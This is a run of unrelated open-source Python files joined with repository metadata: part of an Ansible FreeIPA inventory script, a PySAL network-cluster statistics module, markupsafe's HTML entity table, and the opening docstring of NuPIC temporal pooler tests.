              "Environment variable IPA_CONFDIR could be used to override "
              "default path." % api.env.confdir)

    if LooseVersion(IPA_VERSION) >= LooseVersion('4.6.2'):
        # With ipalib < 4.6.0 'server' and 'domain' have default values
        # ('localhost:8888', 'example.com'), newer versions don't and
        # DNS autodiscovery is broken, then one of jsonrpc_uri / xmlrpc_uri is
        # required.
        # ipalib 4.6.0 is unusable (https://pagure.io/freeipa/issue/7132)
        # that's why 4.6.2 is explicitly tested.
        if 'server' not in api.env or 'domain' not in api.env:
            sys.exit("ERROR: ('jsonrpc_uri' or 'xmlrpc_uri') or 'domain' are not "
                     "defined in '[global]' section of '%s' nor in '%s'." %
                     (api.env.conf, api.env.conf_default))

    api.finalize()
    try:
        api.Backend.rpcclient.connect()
    except AttributeError:
        # FreeIPA < 4.0 compatibility
        api.Backend.xmlclient.connect()

    return api
def list_groups(api):
    '''
    Print a JSON inventory of all host groups to stdout.

    Args:
        api: an initialized FreeIPA/IPA API object

    Returns: None (the inventory is printed, not returned)
    '''
    inventory = {}
    hostvars = {}

    for hostgroup in api.Command.hostgroup_find(all=True)['result']:
        # Direct members plus indirect members contributed by nested
        # hostgroups.
        members = list(hostgroup.get('member_host', []))
        members.extend(hostgroup.get('memberindirect_host', []))
        inventory[hostgroup['cn'][0]] = {'hosts': list(members)}
        for member in members:
            hostvars[member] = {}

    inventory['_meta'] = {'hostvars': hostvars}
    print(json.dumps(inventory, indent=1, sort_keys=True))
    return None
def parse_args():
    '''
    Parse command-line arguments.

    Exactly one of --list or --host must be supplied (enforced by a
    required mutually exclusive group).
    '''
    parser = argparse.ArgumentParser(
        description='Ansible FreeIPA/IPA inventory module')
    mode = parser.add_mutually_exclusive_group(required=True)
    mode.add_argument('--list', action='store_true',
                      help='List active servers')
    mode.add_argument('--host', help='List details about the specified host')
    return parser.parse_args()
def get_host_attributes(api, host):
    """
    Look up a single host and return its variables as a JSON string.

    Args:
        api: an initialized FreeIPA API object
        host: hostname to look up

    Returns: JSON-encoded dict of host variables; an empty JSON object
    ('{}') when the host is not found.  (The original implementation
    returned a Python dict in the not-found case and a JSON string
    otherwise; the return type is now consistent, and printing the
    result produces the same '{}' output as before.)
    """
    try:
        result = api.Command.host_show(u(host))['result']
        # Certificates are bulky and not useful as inventory vars.
        if 'usercertificate' in result:
            del result['usercertificate']
        return json.dumps(result, indent=1)
    except errors.NotFound:
        return json.dumps({})
if __name__ == '__main__':
    # Parse CLI options first so bad usage fails fast, before touching
    # the IPA API (which requires a Kerberos ticket).
    args = parse_args()
    api = initialize()
    if args.host:
        print(get_host_attributes(api, args.host))
    elif args.list:
        list_groups(api)
| gpl-3.0 |
AlanZatarain/pysal | pysal/contrib/network/lincs.py | 15 | 13081 | #!/usr/bin/env python
"""
A library for computing local indicators of network-constrained clusters
Author:
Myunghwa Hwang mhwang4@gmail.com
"""
import unittest
import numpy as np
import scipy.stats as stats
import geodanet.network as pynet
import pysal, copy
import time
def unconditional_sim(event, base, s):
    """
    Simulate event counts under the unconditional binomial model:
    each area's count is drawn as Binomial(base_i, overall risk),
    where the overall risk is sum(event)/sum(base).

    Parameters:
        event: n*1 numpy array with integer values
               observed values for an event variable
        base: n*1 numpy array with integer values
              observed values for a population variable; never modified
        s: integer
           the number of simulations

    Returns:
        : n*s numpy array; rows whose base value is zero are forced
          to zero
    """
    mean_risk = event.sum() * 1.0 / base.sum()
    # Work on an integer copy so the caller's array is never mutated.
    # (The original implementation incremented `base` in place when it
    # already had an integer dtype.)
    trials = np.array([int(v) for v in base])
    base_zeros = (trials == 0)
    # np.random.binomial requires n >= 1; bump zero-population rows to
    # one trial and zero their draws out afterwards.
    trials[base_zeros] += 1
    sims = np.random.binomial(trials, mean_risk, (s, len(event))).transpose()
    sims[base_zeros, :] = 0
    return sims
def unconditional_sim_poisson(event, base, s):
    """
    Simulate event counts under the unconditional Poisson model:
    each area's expected count is its base value times the overall
    risk sum(event)/sum(base).

    Parameters:
        event: n*1 numpy array with integer values
               observed values for an event variable
        base: n*1 numpy array with integer values
              observed values for a population variable
        s: integer
           the number of simulations

    Returns:
        : n*s numpy array
    """
    overall_risk = event.sum() * 1.0 / base.sum()
    expected = base * overall_risk
    return np.random.poisson(expected, (s, len(event))).T
def conditional_multinomial(event, base, s):
    """
    Simulate event counts conditional on the observed total: the
    m = sum(event) events are distributed across areas with
    probabilities proportional to the base variable.

    Parameters:
        event: n*1 numpy array with integer values
               observed values for an event variable
        base: n*1 numpy array with integer values
              observed values for a population variable
        s: integer
           the number of simulations

    Returns:
        : n*s numpy array
    """
    total_events = int(event.sum())
    shares = base * 1.0 / base.sum()
    return np.random.multinomial(total_events, shares, s).T
def pseudo_pvalues(obs, sims):
    """
    Compute pseudo p-values from observed indices and their simulated
    counterparts.

    Parameters:
        obs: n*1 numpy array of observed values
        sims: n*sims numpy array; sims is the number of simulations

    Returns:
        p_sim : n*1 numpy array of pseudo p-values
        E_sim : mean of all simulated values (scalar)
        SE_sim: standard deviation of all simulated values (scalar)
        V_sim: variance of all simulated values (scalar)
        z_sim: standardized observed values
        p_z_sim: p-values of z_sim under a normal distribution
    """
    reps = sims.T  # one simulation per row
    permutations = reps.shape[0]
    # Per-column count of simulated values >= the observed value.
    extreme = (reps >= obs).sum(axis=0)
    # Two-sided adjustment: use whichever tail is smaller.
    low_tail = (permutations - extreme) < extreme
    extreme[low_tail] = permutations - extreme[low_tail]
    p_sim = (extreme + 1.0) / (permutations + 1.0)
    E_sim = reps.mean()
    SE_sim = reps.std()
    V_sim = SE_sim * SE_sim
    z_sim = (obs - E_sim) / SE_sim
    p_z_sim = 1 - stats.norm.cdf(np.abs(z_sim))
    return p_sim, E_sim, SE_sim, V_sim, z_sim, p_z_sim
def node_weights(network, attribute=False):
    """
    Obtains a spatial weights matrix of edges in a network;
    if two edges share a node, they are neighbors.

    Parameters:
        network: a network with/without attributes
        attribute: boolean
                   if true, attributes of edges are added to a dictionary of edges,
                   which is a return value
    Returns:
        w: a spatial weights instance
        id2link: an associative dictionary that connects a sequential id to a unique
                 edge on the network;
                 if attribute is true, each item in the dictionary includes the attributes

    NOTE(review): edge ids are assigned in dict-iteration order of
    `network`, so the numbering (and thus w.id_order downstream) is
    only reproducible when the network dict's iteration order is.
    """
    link2id, id2link = {}, {}
    counter = 0
    neighbors, weights = {},{}
    for n1 in network:
        for n2 in network[n1]:
            # Process this edge if it has not been seen yet, or was
            # registered as a neighbor but not yet given its own
            # neighbor list.
            if (n1,n2) not in link2id or link2id[(n1,n2)] not in neighbors:
                if (n1,n2) not in link2id:
                    # Register the edge under both directions.
                    link2id[(n1,n2)] = counter
                    link2id[(n2,n1)] = counter
                    if not attribute:
                        id2link[counter] = (n1, n2)
                    else:
                        # Attach the edge's extra attributes (everything
                        # after the length) alongside its node pair.
                        id2link[counter] = tuple([(n1,n2)] + list(network[n1][n2][1:]))
                    counter += 1
                # All edges sharing either endpoint are neighbors.
                neighbors_from_n1 = [(n1, n) for n in network[n1] if n != n2]
                neighbors_from_n2 = [(n2, n) for n in network[n2] if n != n1]
                neighbors_all = neighbors_from_n1 + neighbors_from_n2
                neighbor_ids = []
                for edge in neighbors_all:
                    if edge not in link2id:
                        # First sighting of a neighboring edge: register
                        # it (both directions) and record it.
                        link2id[edge] = counter
                        link2id[(edge[-1], edge[0])] = counter
                        if not attribute:
                            id2link[counter] = edge
                        else:
                            id2link[counter] = tuple([edge] + list(network[edge[0]][edge[1]][1:]))
                        neighbor_ids.append(counter)
                        counter += 1
                    else:
                        neighbor_ids.append(link2id[edge])
                neighbors[link2id[(n1,n2)]] = neighbor_ids
                # Binary weights: every shared-node neighbor gets 1.0.
                weights[link2id[(n1,n2)]] = [1.0]*(len(neighbors_from_n1) + len(neighbors_from_n2))
    return pysal.weights.W(neighbors, weights), id2link
def edgepoints_from_network(network, attribute=False):
    """
    Project the midpoint of every edge onto the network.

    Parameters:
        network: adjacency dict; network[n1][n2] is either the edge
                 length or a list whose first element is the length
                 (followed by attributes)
        attribute: boolean
                   if true, each edge's extra attributes are collected
                   into the second return value

    Returns:
        id2linkpoints: dict mapping a sequential edge id to
                       (node_a, node_b, half_length, half_length),
                       with endpoints in canonical coordinate order
        id2attr: dict mapping edge id to the edge's attribute list
                 (empty unless attribute is true)
        link2id: dict mapping each directed node pair to its edge id
    """
    link2id = {}
    id2linkpoints = {}
    id2attr = {}
    next_id = 0
    for n1 in network:
        for n2 in network[n1]:
            if (n1,n2) in link2id and (n2,n1) in link2id:
                continue  # both directions already registered
            edge_data = network[n1][n2]
            link2id[(n1,n2)] = next_id
            link2id[(n2,n1)] = next_id
            # The edge value is either a bare length or a list whose
            # first element is the length.
            if type(edge_data) != list:
                half_dist = edge_data/2
            else:
                half_dist = edge_data[0]/2
            # Canonical endpoint order: smaller (x, y) coordinate first.
            if n1[0] < n2[0] or (n1[0] == n2[0] and n1[1] < n2[1]):
                id2linkpoints[next_id] = (n1, n2, half_dist, half_dist)
            else:
                id2linkpoints[next_id] = (n2, n1, half_dist, half_dist)
            if attribute:
                id2attr[next_id] = edge_data[1:]
            next_id += 1
    return id2linkpoints, id2attr, link2id
def dist_weights(network, id2linkpoints, link2id, bandwidth):
    """
    Obtains a distance-based spatial weights matrix using network distance.

    Parameters:
        network: an undirected network without additional attributes
        id2linkpoints: a dictionary that includes a list of network-projected, midpoints of edges in the network
        link2id: a dictionary that associates each edge to a unique id
        bandwidth: a threshold distance for creating a spatial weights matrix

    Returns:
        w : a distance-based, binary spatial weights matrix
        id2link: a dictionary that associates a unique id to each edge of the network
    """
    # NOTE(review): written for Python 2 — .values() is a list that is
    # indexed by the integer edge ids below; this assumes the values
    # come out in id order.  Confirm before porting to Python 3.
    linkpoints = id2linkpoints.values()
    neighbors, id2link = {}, {}
    net_distances = {}
    for linkpoint in id2linkpoints:
        # NOTE(review): this guard tests the linkpoint tuple, but the
        # keys stored in net_distances are endpoint nodes, so the test
        # never matches and Dijkstra runs for every edge — confirm
        # whether caching across iterations was intended.
        if linkpoints[linkpoint] not in net_distances:
            net_distances[linkpoints[linkpoint][0]] = pynet.dijkstras(network, linkpoints[linkpoint][0], r=bandwidth)
            net_distances[linkpoints[linkpoint][1]] = pynet.dijkstras(network, linkpoints[linkpoint][1], r=bandwidth)
        # All midpoints within the bandwidth of this edge's midpoint.
        ngh = pynet.proj_distances_undirected(network, linkpoints[linkpoint], linkpoints, r=bandwidth, cache=net_distances)
        #ngh = pynet.proj_distances_undirected(network, linkpoints[linkpoint], linkpoints, r=bandwidth)
        # An edge is not its own neighbor.
        if linkpoints[linkpoint] in ngh:
            del ngh[linkpoints[linkpoint]]
        if linkpoint not in neighbors:
            neighbors[linkpoint] = []
        for k in ngh.keys():
            neighbor = link2id[k[:2]]
            # Record the relation symmetrically, avoiding duplicates.
            if neighbor not in neighbors[linkpoint]:
                neighbors[linkpoint].append(neighbor)
            if neighbor not in neighbors:
                neighbors[neighbor] = []
            if linkpoint not in neighbors[neighbor]:
                neighbors[neighbor].append(linkpoint)
        id2link[linkpoint] = id2linkpoints[linkpoint][:2]
    # Binary weights: 1.0 for every neighbor within the bandwidth.
    weights = copy.copy(neighbors)
    for ngh in weights:
        weights[ngh] = [1.0]*len(weights[ngh])
    return pysal.weights.W(neighbors, weights), id2link
def lincs(network, event, base, weight, dist=None, lisa_func='moran',
          sim_method="permutations", sim_num=99):
    """
    Compute a local spatial statistic (LISA) for every edge in the network.

    Parameters:
    network: a clean network where each edge has up to three attributes:
             its length, an event variable, and a base variable
    event: integer
           an index for the event variable
    base: integer
          an index for the base variable
    weight: string
            type of binary spatial weights;
            two options are allowed: Node-based, Distance-based
    dist: float
          threshold distance value for the distance-based weight
    lisa_func: string
               type of LISA function;
               three options allowed: moran, g, and g_star
    sim_method: string
                type of simulation method;
                four options allowed: permutations, binomial (unconditional),
                poisson (unconditional), multinomial (conditional)
    sim_num: integer
             the number of simulations

    Returns:
    : a list of per-edge tuples
      (edge geometry, event value, base value, statistic, quadrant/Z, pseudo p-value)
    : a PySAL spatial weights object used for the computation
    """
    if lisa_func in ('g', 'g_star') and weight == 'Node-based':
        # The original printed a message and then executed a bare ``raise``,
        # which itself errors out ("no active exception to re-raise").
        # Raise a real, catchable exception instead.
        raise ValueError('Local G statistics can work only with '
                         'distance-based weights matrix')
    # Decide the G* flag while lisa_func is still the caller's string.
    # (The original compared lisa_func to 'g_star' *after* rebinding it to a
    # PySAL callable, so the flag could never become True.)
    star = (lisa_func == 'g_star')
    if lisa_func == 'moran':
        lisa_func = pysal.esda.moran.Moran_Local
    else:
        lisa_func = pysal.esda.getisord.G_Local
    if base:
        def getBase(edges, edge, base):
            return edges[edge][base]
    else:
        def getBase(edges, edge, base):
            # No base variable: rates degenerate to raw event counts.
            return 1.0
    w, edges, e, b, edges_geom = None, None, None, None, []
    if weight == 'Node-based':
        w, edges = node_weights(network, attribute=True)
        n = len(edges)
        e, b = np.zeros(n), np.zeros(n)
        for edge in edges:
            edges_geom.append(edges[edge][0])
            e[edge] = edges[edge][event]
            b[edge] = getBase(edges, edge, base)
        w.id_order = edges.keys()
    elif dist is not None:
        id2edgepoints, id2attr, edge2id = edgepoints_from_network(network, attribute=True)
        # Collapse each edge's attribute tuple down to its length so that
        # dist_weights sees plain scalar edge lengths.
        for n1 in network:
            for n2 in network[n1]:
                network[n1][n2] = network[n1][n2][0]
        w, edges = dist_weights(network, id2edgepoints, edge2id, dist)
        n = len(id2attr)
        e, b = np.zeros(n), np.zeros(n)
        # id2attr holds only the non-length attributes, so indexes shift by one.
        if base:
            base -= 1
        for edge in id2attr:
            edges_geom.append(edges[edge])
            e[edge] = id2attr[edge][event - 1]
            b[edge] = getBase(id2attr, edge, base)
        w.id_order = id2attr.keys()
    Is, p_sim, Zs = None, None, None
    # Accept both spellings; the docstring advertises 'permutations' but the
    # original code only matched 'permutation'.
    if sim_method in ('permutation', 'permutations'):
        if lisa_func == pysal.esda.moran.Moran_Local:
            lisa_i = lisa_func(e*1.0/b, w, transformation="r", permutations=sim_num)
            Is = lisa_i.Is
            Zs = lisa_i.q
        else:
            lisa_i = lisa_func(e*1.0/b, w, transform="R", permutations=sim_num, star=star)
            Is = lisa_i.Gs
            Zs = lisa_i.Zs
        p_sim = lisa_i.p_sim
    else:
        # Compute the observed statistic once, then build the reference
        # distribution from Monte Carlo replicates of the event counts.
        sims = None
        if lisa_func == pysal.esda.moran.Moran_Local:
            lisa_i = lisa_func(e*1.0/b, w, transformation="r", permutations=0)
            Is = lisa_i.Is
            Zs = lisa_i.q
        else:
            lisa_i = lisa_func(e*1.0/b, w, transform="R", permutations=0, star=star)
            Is = lisa_i.Gs
            Zs = lisa_i.Zs
        if sim_method == 'binomial':
            sims = unconditional_sim(e, b, sim_num)
        elif sim_method == 'poisson':
            sims = unconditional_sim_poisson(e, b, sim_num)
        else:
            sims = conditional_multinomial(e, b, sim_num)
        # Replace each simulated column with its LISA values in place.
        if lisa_func == pysal.esda.moran.Moran_Local:
            for i in range(sim_num):
                sims[:, i] = lisa_func(sims[:, i]*1.0/b, w, transformation="r", permutations=0).Is
        else:
            for i in range(sim_num):
                sims[:, i] = lisa_func(sims[:, i]*1.0/b, w, permutations=0, star=star).Gs
        sim_res = pseudo_pvalues(Is, sims)
        p_sim = sim_res[0]
    w.transform = 'O'
    return zip(edges_geom, e, b, Is, Zs, p_sim), w
| bsd-3-clause |
andrewleech/SickRage | lib/markupsafe/_constants.py | 1535 | 4795 | # -*- coding: utf-8 -*-
"""
markupsafe._constants
~~~~~~~~~~~~~~~~~~~~~
Highlevel implementation of the Markup string.
:copyright: (c) 2010 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
# Mapping of HTML named character references (entity names, without the
# surrounding '&' and ';') to their Unicode code points in decimal.
# Includes 'apos' (39), which is XML/XHTML rather than HTML 4.
HTML_ENTITIES = {
    'AElig': 198,
    'Aacute': 193,
    'Acirc': 194,
    'Agrave': 192,
    'Alpha': 913,
    'Aring': 197,
    'Atilde': 195,
    'Auml': 196,
    'Beta': 914,
    'Ccedil': 199,
    'Chi': 935,
    'Dagger': 8225,
    'Delta': 916,
    'ETH': 208,
    'Eacute': 201,
    'Ecirc': 202,
    'Egrave': 200,
    'Epsilon': 917,
    'Eta': 919,
    'Euml': 203,
    'Gamma': 915,
    'Iacute': 205,
    'Icirc': 206,
    'Igrave': 204,
    'Iota': 921,
    'Iuml': 207,
    'Kappa': 922,
    'Lambda': 923,
    'Mu': 924,
    'Ntilde': 209,
    'Nu': 925,
    'OElig': 338,
    'Oacute': 211,
    'Ocirc': 212,
    'Ograve': 210,
    'Omega': 937,
    'Omicron': 927,
    'Oslash': 216,
    'Otilde': 213,
    'Ouml': 214,
    'Phi': 934,
    'Pi': 928,
    'Prime': 8243,
    'Psi': 936,
    'Rho': 929,
    'Scaron': 352,
    'Sigma': 931,
    'THORN': 222,
    'Tau': 932,
    'Theta': 920,
    'Uacute': 218,
    'Ucirc': 219,
    'Ugrave': 217,
    'Upsilon': 933,
    'Uuml': 220,
    'Xi': 926,
    'Yacute': 221,
    'Yuml': 376,
    'Zeta': 918,
    'aacute': 225,
    'acirc': 226,
    'acute': 180,
    'aelig': 230,
    'agrave': 224,
    'alefsym': 8501,
    'alpha': 945,
    'amp': 38,
    'and': 8743,
    'ang': 8736,
    'apos': 39,
    'aring': 229,
    'asymp': 8776,
    'atilde': 227,
    'auml': 228,
    'bdquo': 8222,
    'beta': 946,
    'brvbar': 166,
    'bull': 8226,
    'cap': 8745,
    'ccedil': 231,
    'cedil': 184,
    'cent': 162,
    'chi': 967,
    'circ': 710,
    'clubs': 9827,
    'cong': 8773,
    'copy': 169,
    'crarr': 8629,
    'cup': 8746,
    'curren': 164,
    'dArr': 8659,
    'dagger': 8224,
    'darr': 8595,
    'deg': 176,
    'delta': 948,
    'diams': 9830,
    'divide': 247,
    'eacute': 233,
    'ecirc': 234,
    'egrave': 232,
    'empty': 8709,
    'emsp': 8195,
    'ensp': 8194,
    'epsilon': 949,
    'equiv': 8801,
    'eta': 951,
    'eth': 240,
    'euml': 235,
    'euro': 8364,
    'exist': 8707,
    'fnof': 402,
    'forall': 8704,
    'frac12': 189,
    'frac14': 188,
    'frac34': 190,
    'frasl': 8260,
    'gamma': 947,
    'ge': 8805,
    'gt': 62,
    'hArr': 8660,
    'harr': 8596,
    'hearts': 9829,
    'hellip': 8230,
    'iacute': 237,
    'icirc': 238,
    'iexcl': 161,
    'igrave': 236,
    'image': 8465,
    'infin': 8734,
    'int': 8747,
    'iota': 953,
    'iquest': 191,
    'isin': 8712,
    'iuml': 239,
    'kappa': 954,
    'lArr': 8656,
    'lambda': 955,
    'lang': 9001,
    'laquo': 171,
    'larr': 8592,
    'lceil': 8968,
    'ldquo': 8220,
    'le': 8804,
    'lfloor': 8970,
    'lowast': 8727,
    'loz': 9674,
    'lrm': 8206,
    'lsaquo': 8249,
    'lsquo': 8216,
    'lt': 60,
    'macr': 175,
    'mdash': 8212,
    'micro': 181,
    'middot': 183,
    'minus': 8722,
    'mu': 956,
    'nabla': 8711,
    'nbsp': 160,
    'ndash': 8211,
    'ne': 8800,
    'ni': 8715,
    'not': 172,
    'notin': 8713,
    'nsub': 8836,
    'ntilde': 241,
    'nu': 957,
    'oacute': 243,
    'ocirc': 244,
    'oelig': 339,
    'ograve': 242,
    'oline': 8254,
    'omega': 969,
    'omicron': 959,
    'oplus': 8853,
    'or': 8744,
    'ordf': 170,
    'ordm': 186,
    'oslash': 248,
    'otilde': 245,
    'otimes': 8855,
    'ouml': 246,
    'para': 182,
    'part': 8706,
    'permil': 8240,
    'perp': 8869,
    'phi': 966,
    'pi': 960,
    'piv': 982,
    'plusmn': 177,
    'pound': 163,
    'prime': 8242,
    'prod': 8719,
    'prop': 8733,
    'psi': 968,
    'quot': 34,
    'rArr': 8658,
    'radic': 8730,
    'rang': 9002,
    'raquo': 187,
    'rarr': 8594,
    'rceil': 8969,
    'rdquo': 8221,
    'real': 8476,
    'reg': 174,
    'rfloor': 8971,
    'rho': 961,
    'rlm': 8207,
    'rsaquo': 8250,
    'rsquo': 8217,
    'sbquo': 8218,
    'scaron': 353,
    'sdot': 8901,
    'sect': 167,
    'shy': 173,
    'sigma': 963,
    'sigmaf': 962,
    'sim': 8764,
    'spades': 9824,
    'sub': 8834,
    'sube': 8838,
    'sum': 8721,
    'sup': 8835,
    'sup1': 185,
    'sup2': 178,
    'sup3': 179,
    'supe': 8839,
    'szlig': 223,
    'tau': 964,
    'there4': 8756,
    'theta': 952,
    'thetasym': 977,
    'thinsp': 8201,
    'thorn': 254,
    'tilde': 732,
    'times': 215,
    'trade': 8482,
    'uArr': 8657,
    'uacute': 250,
    'uarr': 8593,
    'ucirc': 251,
    'ugrave': 249,
    'uml': 168,
    'upsih': 978,
    'upsilon': 965,
    'uuml': 252,
    'weierp': 8472,
    'xi': 958,
    'yacute': 253,
    'yen': 165,
    'yuml': 255,
    'zeta': 950,
    'zwj': 8205,
    'zwnj': 8204
}
| gpl-3.0 |
jkthompson/nupic | examples/tp/tp_test.py | 9 | 90129 | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
This file performs a variety of tests on the reference temporal pooler code.
basic_test
==========
Tests creation and serialization of the TP class. Sets parameters and ensures
they are the same after a serialization and de-serialization step. Runs learning
and inference on a small number of random patterns and ensures it doesn't crash.
===============================================================================
Basic First Order Sequences
===============================================================================
These tests ensure the most basic (first order) sequence learning mechanism is
working.
Parameters: Use a "fast learning mode": turn off global decay, temporal pooling
and hilo (make minThreshold really high). initPerm should be greater than
connectedPerm and permanenceDec should be zero. With these settings sequences
should be learned in one pass:
minThreshold = newSynapseCount
globalDecay = 0
temporalPooling = False
initialPerm = 0.8
connectedPerm = 0.7
permanenceDec = 0
permanenceInc = 0.4
Other Parameters:
numCols = 100
cellsPerCol = 1
newSynapseCount=11
activationThreshold = 8
permanenceMax = 1
Note: this is not a high order sequence, so one cell per column is fine.
Input Sequence: We train with M input sequences, each consisting of N random
patterns. Each pattern consists of a random number of bits on. The number of 1's
in each pattern should be between 21 and 25 columns. The sequences are
constructed so that consecutive patterns within a sequence don't share any
columns.
Training: The TP is trained with P passes of the M sequences. There
should be a reset between sequences. The total number of iterations during
training is P*N*M.
Testing: Run inference through the same set of sequences, with a reset before
each sequence. For each sequence the system should accurately predict the
pattern at the next time step up to and including the N-1'st pattern. A perfect
prediction consists of getting every column correct in the prediction, with no
extra columns. We report the number of columns that are incorrect and report a
failure if more than 2 columns are incorrectly predicted.
We can also calculate the number of segments and synapses that should be
learned. We raise an error if too many or too few were learned.
B1) Basic sequence learner. M=1, N=100, P=1.
B2) Same as above, except P=2. Test that permanences go up and that no
additional synapses or segments are learned.
B3) N=300, M=1, P=1. (See how high we can go with M)
B4) N=100, M=3, P=1 (See how high we can go with N*M)
B5) Like B1) but only have newSynapseCount columns ON in each pattern (instead of
between 21 and 25), and set activationThreshold to newSynapseCount.
B6) Like B1 but with cellsPerCol = 4. First order sequences should still work
just fine.
B7) Like B1 but with slower learning. Set the following parameters differently:
activationThreshold = newSynapseCount
minThreshold = activationThreshold
initialPerm = 0.2
connectedPerm = 0.7
permanenceInc = 0.2
Now we train the TP with the B1 sequence 4 times (P=4). This will increment
the permanences to be above 0.8 and at that point the inference will be correct.
This test will ensure the basic match function and segment activation rules are
working correctly.
B8) Like B7 but with 4 cells per column. Should still work.
B9) Like B7 but present the sequence less than 4 times: the inference should be
incorrect.
B10) Like B2, except that cells per column = 4. Should still add zero additional
synapses.
===============================================================================
High Order Sequences
===============================================================================
These tests ensure that high order sequences can be learned in a multiple cells
per column instantiation.
Parameters: Same as Basic First Order Tests above, but with varying cells per
column.
Input Sequence: We train with M input sequences, each consisting of N random
patterns. Each pattern consists of a random number of bits on. The number of 1's
in each pattern should be between 21 and 25 columns (except for H0). The
sequences are constructed so that consecutive patterns within a sequence don't
share any columns. The sequences are constructed to contain shared subsequences,
such as:
A B C D E F G H I J
K L M D E F N O P Q
The position and length of shared subsequences are parameters in the tests.
Training: Identical to basic first order tests above.
Testing: Identical to basic first order tests above unless noted.
We can also calculate the number of segments and synapses that should be
learned. We raise an error if too many or too few were learned.
H0) Two simple high order sequences, each of length 7, with a shared
subsequence in positions 2-4. Each pattern has a consecutive set of 5 bits on.
No pattern shares any columns with the others. These sequences are easy to
visualize and is very useful for debugging.
H1) Learn two sequences with a short shared pattern. Parameters
should be the same as B1. This test will FAIL since cellsPerCol == 1. No
consecutive patterns share any column.
H2) As above but with cellsPerCol == 4. This test should PASS. No consecutive
patterns share any column.
H2a) Same as above, except P=2. Test that permanences go up and that no
additional synapses or segments are learned.
H3) Same parameters as H.2 except sequences are created such that they share a
single significant sub-sequence. Subsequences should be reasonably long and in
the middle of sequences. No consecutive patterns share any column.
H4) Like H.3, except the shared subsequence is in the beginning. (e.g.
"ABCDEF" and "ABCGHIJ". At the point where the shared subsequence ends, all
possible next patterns should be predicted. As soon as you see the first unique
pattern, the predictions should collapse to be a perfect prediction.
H5) Shared patterns. Similar to H3 except that patterns are shared between
sequences. All sequences are different shufflings of the same set of N
patterns (there is no shared subsequence). Care should be taken such that the
same three patterns never follow one another in two sequences.
H6) Combination of H5) and H3). Shared patterns in different sequences, with a
shared subsequence.
H7) Stress test: every other pattern is shared. [Unimplemented]
H8) Start predicting in the middle of a sequence. [Unimplemented]
H9) Hub capacity. How many patterns can use that hub?
[Implemented, but does not run by default.]
H10) Sensitivity to small amounts of noise during inference. [Unimplemented]
H11) Higher order patterns with alternating elements.
Create the following 4 sequences:
A B A B A C
A B A B D E
A B F G H I
A J K L M N
After training we should verify that the expected transitions are in the
model. Prediction accuracy should be perfect. In addition, during inference,
after the first element is presented, the columns should not burst any more.
Need to verify, for the first sequence, that the high order representation
when presented with the second A and B is different from the representation
in the first presentation.
===============================================================================
Temporal Pooling Tests [UNIMPLEMENTED]
===============================================================================
Parameters: Use a "fast learning mode": With these settings sequences should be
learned in one pass:
minThreshold = newSynapseCount
globalDecay = 0
initialPerm = 0.8
connectedPerm = 0.7
permanenceDec = 0
permanenceInc = 0.4
Other Parameters:
cellsPerCol = 4
newSynapseCount=11
activationThreshold = 11
permanenceMax = 1
doPooling = True
Input Sequence: We train with M input sequences, each consisting of N random
patterns. Each pattern consists of a random number of bits on. The number of 1's
in each pattern should be between 17 and 21 columns. The sequences are
constructed so that consecutive patterns within a sequence don't share any
columns.
Note: for pooling tests the density of input patterns should be pretty low
since each pooling step increases the output density. At the same time, we need
enough bits on in the input for the temporal pooler to find enough synapses. So,
for the tests, constraints should be something like:
(Input Density) * (Number of pooling steps) < 25 %.
AND
sum(Input) > newSynapseCount*1.5
Training: The TP is trained with P passes of the M sequences. There
should be a reset between sequences. The total number of iterations during
training is P*N*M.
Testing: Run inference through the same set of sequences, with a reset before
each sequence. For each sequence the system should accurately predict the
pattern at the next P time steps, up to and including the N-P'th pattern. A
perfect prediction consists of getting every column correct in the prediction,
with no extra columns. We report the number of columns that are incorrect and
report a failure if more than 2 columns are incorrectly predicted.
P1) Train the TP two times (P=2) on a single long sequence consisting of random
patterns (N=20, M=1). There should be no overlapping columns between successive
patterns. During inference, the TP should be able reliably predict the pattern
two time steps in advance. numCols should be about 350 to meet the above
constraints and also to maintain consistency with test P2.
P2) Increase TP rate to 3 time steps in advance (P=3). At each step during
inference, the TP should be able to reliably predict the pattern coming up at
t+1, t+2, and t+3..
P3) Set segUpdateValidDuration to 2 and set P=3. This should behave almost
identically to P1. It should only predict the next time step correctly and not
two time steps in advance. (Check off by one error in this logic.)
P4) As above, but with multiple sequences.
P5) Same as P3 but with shared subsequences.
Continuous mode tests
=====================
Slow changing inputs.
Orphan Decay Tests
==================
HiLo Tests
==========
A high order sequence memory like the TP can memorize very long sequences. In
many applications though you don't want to memorize. You see a long sequence of
patterns but there are actually lower order repeating sequences embedded within
it. A simplistic example is words in a sentence, where short word-level sequences repeat in many different contexts. You'd like the TP to learn those sequences.
Tests should capture number of synapses learned and compare against
theoretically optimal numbers to pass/fail.
HL0a) For debugging, similar to H0. We want to learn a 3 pattern long sequence presented
with noise before and after, with no resets. Two steps of noise will be presented.
The noise will be 20 patterns, presented in random order. Every pattern has a
consecutive set of 5 bits on, so the vector will be 115 bits long. No pattern
shares any columns with the others. These sequences are easy to visualize and is
very useful for debugging.
TP parameters should be the same as B7 except that permanenceDec should be 0.05:
activationThreshold = newSynapseCount
minThreshold = activationThreshold
initialPerm = 0.2
connectedPerm = 0.7
permanenceInc = 0.2
permanenceDec = 0.05
So, this means it should learn a sequence after 4 repetitions. It will take
4 orphan decay steps to get an incorrect synapse to go away completely.
HL0b) Like HL0a, but after the 3-sequence is learned, try to learn a 4-sequence that
builds on the 3-sequence. For example, if learning A-B-C we train also on
D-A-B-C. It should learn that ABC is separate from DABC. Note: currently this
test is disabled in the code. It is a bit tricky to test this. When you present DAB,
you should predict the same columns as when you present AB (i.e. in both cases
C should be predicted). However, the representation for C in DABC should be
different than the representation for C in ABC. Furthermore, when you present
AB, the representation for C should be an OR of the representation in DABC and ABC
